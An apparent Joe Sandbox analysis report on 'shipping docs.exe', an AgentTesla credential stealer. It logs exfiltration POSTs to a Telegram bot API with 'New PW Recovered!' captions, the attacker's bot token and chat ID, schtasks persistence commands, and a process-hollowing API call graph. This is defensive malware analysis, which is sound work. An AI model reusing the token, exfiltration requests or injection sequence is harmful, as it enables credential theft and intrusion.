                                                                                            Nov 29, 2022 21:20:33.191715002 CET49700443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:47.552496910 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:47.552612066 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.552792072 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:47.617912054 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:47.617959023 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.682044029 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.682136059 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:47.684530973 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:47.684552908 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.684855938 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.890943050 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.891128063 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:48.564800978 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:48.564868927 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:48.591984034 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:48.592714071 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:48.592767954 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:48.679336071 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:48.679500103 CET44349701149.154.167.220192.168.2.3
                                                                                            Nov 29, 2022 21:20:48.679678917 CET49701443192.168.2.3149.154.167.220
                                                                                            Nov 29, 2022 21:20:48.680298090 CET49701443192.168.2.3149.154.167.220

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 29, 2022 21:19:34.235759974 CET4997753192.168.2.38.8.8.8
                                                                                            Nov 29, 2022 21:19:34.253768921 CET53499778.8.8.8192.168.2.3
                                                                                            Nov 29, 2022 21:20:32.392975092 CET5784053192.168.2.38.8.8.8
                                                                                            Nov 29, 2022 21:20:32.412163019 CET53578408.8.8.8192.168.2.3
                                                                                            Nov 29, 2022 21:20:47.509844065 CET5799053192.168.2.38.8.8.8
                                                                                            Nov 29, 2022 21:20:47.527040005 CET53579908.8.8.8192.168.2.3

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Nov 29, 2022 21:19:34.235759974 CET192.168.2.38.8.8.80x7d34Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                            Nov 29, 2022 21:20:32.392975092 CET192.168.2.38.8.8.80xd170Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                            Nov 29, 2022 21:20:47.509844065 CET192.168.2.38.8.8.80x8851Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 29, 2022 21:18:52.397281885 CET8.8.8.8192.168.2.30x741bNo error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 29, 2022 21:18:52.397281885 CET8.8.8.8192.168.2.30x741bNo error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)false
                                                                                            Nov 29, 2022 21:19:34.253768921 CET8.8.8.8192.168.2.30x7d34No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                            Nov 29, 2022 21:20:32.412163019 CET8.8.8.8192.168.2.30xd170No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                            Nov 29, 2022 21:20:47.527040005 CET8.8.8.8192.168.2.30x8851No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • api.telegram.org

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.349699149.154.167.220443C:\Users\user\Desktop\shipping docs.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-11-29 20:19:34 UTC0OUTPOST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 1006
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2022-11-29 20:19:34 UTC0INHTTP/1.1 100 Continue
                                                                                            2022-11-29 20:19:34 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 36 37 62 32 61 63 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 36 37 62 32 61 63 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 31 38 33 32 31 0a 4f 53 46 75 6c 6c
                                                                                            Data Ascii: -----------------------------8dad24f67b2ac65Content-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad24f67b2ac65Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/618321OSFull
                                                                                            2022-11-29 20:19:34 UTC1INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Tue, 29 Nov 2022 20:19:34 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 644
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":true,"result":{"message_id":310,"from":{"id":5676971476,"is_bot":true,"first_name":"strongerman","username":"strongermanbot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1669753174,"document":{"file_name":"user-618321 2022-11-29 21-19-30.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBNmOGaVZkeJOlahMd7RgEEfRREDp1AAKGEAACD804UE5y_p8XQxsMKwQ","file_unique_id":"AgADhhAAAg_NOFA","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.349700149.154.167.220443C:\Users\user\Desktop\shipping docs.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-11-29 20:20:32 UTC2OUTPOST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=---------------------------8dad24f8bdcd188
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 1006
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2022-11-29 20:20:32 UTC2INHTTP/1.1 100 Continue
                                                                                            2022-11-29 20:20:32 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 38 62 64 63 64 31 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 38 62 64 63 64 31 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 31 38 33 32 31 0a 4f 53 46 75 6c 6c
                                                                                            Data Ascii: -----------------------------8dad24f8bdcd188Content-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad24f8bdcd188Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/618321OSFull
                                                                                            2022-11-29 20:20:33 UTC3INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Tue, 29 Nov 2022 20:20:33 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 644
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":true,"result":{"message_id":311,"from":{"id":5676971476,"is_bot":true,"first_name":"strongerman","username":"strongermanbot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1669753233,"document":{"file_name":"user-618321 2022-11-29 21-20-31.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBN2OGaZHRgrJuUwePcvH_QNl91xMeAAKHEAACD804UEp9TiMBCfU9KwQ","file_unique_id":"AgADhxAAAg_NOFA","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.2.349701149.154.167.220443C:\Users\user\Desktop\shipping docs.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-11-29 20:20:48 UTC4OUTPOST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=---------------------------8dad24f9334eaaa
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 1006
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2022-11-29 20:20:48 UTC4INHTTP/1.1 100 Continue
                                                                                            2022-11-29 20:20:48 UTC4OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 39 33 33 34 65 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 39 33 33 34 65 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 31 38 33 32 31 0a 4f 53 46 75 6c 6c
                                                                                            Data Ascii: -----------------------------8dad24f9334eaaaContent-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad24f9334eaaaContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/618321OSFull
                                                                                            2022-11-29 20:20:48 UTC5INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Tue, 29 Nov 2022 20:20:48 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 644
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":true,"result":{"message_id":313,"from":{"id":5676971476,"is_bot":true,"first_name":"strongerman","username":"strongermanbot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1669753248,"document":{"file_name":"user-618321 2022-11-29 21-20-43.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBOWOGaaDiWt7zrb8IZSr8Wvk1uQO8AAKJEAACD804UE0tpTB8RDcQKwQ","file_unique_id":"AgADiRAAAg_NOFA","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:21:18:57
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\Desktop\shipping docs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\shipping docs.exe
                                                                                            Imagebase:0x140000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:21:19:08
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
                                                                                            Imagebase:0xe0000
                                                                                            File size:185856 bytes
                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:21:19:08
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:21:19:09
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\Desktop\shipping docs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:{path}
                                                                                            Imagebase:0xbb0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:21:19:09
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            Imagebase:0x8f0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 73%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:21:19:26
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                                                                                            Imagebase:0x9a0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 73%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:21:19:36
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
                                                                                            Imagebase:0x7f0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:21:19:41
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
                                                                                            Imagebase:0xe0000
                                                                                            File size:185856 bytes
                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:21:19:42
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:21:19:44
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:{path}
                                                                                            Imagebase:0xaf0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:19
                                                                                            Start time:21:19:56
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
                                                                                            Imagebase:0xe0000
                                                                                            File size:185856 bytes
                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:20
                                                                                            Start time:21:19:57
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:21:19:57
                                                                                            Start date:29/11/2022
                                                                                            Path:C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:{path}
                                                                                            Imagebase:0x9a0000
                                                                                            File size:606720 bytes
                                                                                            MD5 hash:6308AE755A893C15A989B1CCF2C56393
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:14.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:13%
                                                                                              Total number of Nodes:285
                                                                                              Total number of Limit Nodes:11
                                                                                              execution_graph 25838 4483908 25839 4483a93 25838->25839 25840 448392e 25838->25840 25840->25839 25845 b7dd04 25840->25845 25848 b7fc99 SetWindowLongW 25840->25848 25850 4483c09 25840->25850 25854 4483c10 PostMessageW 25840->25854 25846 b7fca0 SetWindowLongW 25845->25846 25847 b7fd0c 25846->25847 25847->25840 25849 b7fd0c 25848->25849 25849->25840 25851 4483c0e PostMessageW 25850->25851 25853 4483bce 25850->25853 25852 4483c7c 25851->25852 25852->25840 25853->25840 25855 4483c7c 25854->25855 25855->25840 26091 4480ff8 26092 4481015 26091->26092 26093 4481084 26092->26093 26096 44813d0 26092->26096 26108 44813c1 26092->26108 26098 44813f7 26096->26098 26097 4481557 26097->26092 26098->26097 26120 44819ec 26098->26120 26125 4481a37 26098->26125 26129 4481ef2 26098->26129 26133 4481ab0 26098->26133 26138 4481dae 26098->26138 26143 4481c7d 26098->26143 26147 448250d 26098->26147 26151 44823cd 26098->26151 26155 4481fec 26098->26155 26110 44813f7 26108->26110 26109 4481557 26109->26092 26110->26109 26111 44819ec 2 API calls 26110->26111 26112 4481fec 2 API calls 26110->26112 26113 44823cd 2 API calls 26110->26113 26114 448250d 2 API calls 26110->26114 26115 4481c7d 2 API calls 26110->26115 26116 4481dae 2 API calls 26110->26116 26117 4481ab0 2 API calls 26110->26117 26118 4481ef2 2 API calls 26110->26118 26119 4481a37 2 API calls 26110->26119 26111->26110 26112->26110 26113->26110 26114->26110 26115->26110 26116->26110 26117->26110 26118->26110 26119->26110 26121 44819f2 26120->26121 26159 4483359 26121->26159 26162 4483360 26121->26162 26122 4481a0e 26165 4482f70 26125->26165 26169 4482f68 26125->26169 26126 4481a48 26173 44830f9 26129->26173 26177 4483100 26129->26177 26130 4481f07 26134 4481ad3 26133->26134 26180 44831a8 26134->26180 26184 44831a0 26134->26184 26135 4481af8 26139 4481dba 26138->26139 26188 4483029 26139->26188 26191 4483030 26139->26191 26140 4481de5 26145 44831a8 WriteProcessMemory 26143->26145 26146 44831a0 WriteProcessMemory 26143->26146 26144 4481c97 26145->26144 26146->26144 26149 4482f68 SetThreadContext 26147->26149 26150 4482f70 SetThreadContext 26147->26150 26148 448251e 26149->26148 26150->26148 26194 4482c00 26151->26194 26198 4482bf5 26151->26198 26157 44831a8 WriteProcessMemory 26155->26157 26158 44831a0 WriteProcessMemory 26155->26158 26156 4482004 26157->26156 26158->26156 26160 44833a1 ResumeThread 26159->26160 26161 44833ce 26160->26161 26161->26122 26163 44833a1 ResumeThread 26162->26163 26164 44833ce 26163->26164 26164->26122 26166 4482fb8 SetThreadContext 26165->26166 26168 4482ff6 26166->26168 26168->26126 26171 4482fb8 SetThreadContext 26169->26171 26172 4482ff6 26171->26172 26172->26126 26174 44830f0 26173->26174 26174->26173 26175 4483143 VirtualAllocEx 26174->26175 26176 448317a 26175->26176 26176->26130 26178 4483143 VirtualAllocEx 26177->26178 26179 448317a 26178->26179 26179->26130 26181 44831f3 WriteProcessMemory 26180->26181 26183 4483244 26181->26183 26183->26135 26185 44831f3 WriteProcessMemory 26184->26185 26187 4483244 26185->26187 26187->26135 26189 448307b ReadProcessMemory 26188->26189 26190 44830be 26189->26190 26190->26140 26192 448307b ReadProcessMemory 26191->26192 26193 44830be 26192->26193 26193->26140 26195 4482c7f CreateProcessW 26194->26195 26197 4482d68 26195->26197 26199 